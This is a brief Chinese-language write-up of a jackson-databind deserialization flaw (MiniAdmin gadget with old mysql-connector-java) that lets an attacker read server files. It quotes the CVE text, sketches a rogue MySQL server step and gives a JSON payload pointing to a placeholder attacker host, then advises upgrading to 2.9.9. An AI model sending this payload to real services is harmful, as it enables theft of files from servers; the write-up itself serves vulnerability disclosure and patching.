在开启Default Typing的情况下,且classpath中存在mysql-connector-java 8.0.15版本(2019.2.1发布)以下,攻击者可以通过发送恶意json数据读取任意文件。mysql-connector-java这个库就是连接数据库时常用的mysql jdbc。
CVE描述如下:
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.
漏洞详情:
com.mysql.cj.jdbc.admin.MiniAdmin
的构造函数接受一个string的值,这个值代表jdbcURL,com.mysql.cj.jdbc.admin.MiniAdmin
类在初始化会连接这个jdbcURL中指定的MySQL数据库。python rogue_mysql_server.py
tail -f mysql.log
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
升级jackson至2.9.9
及以上。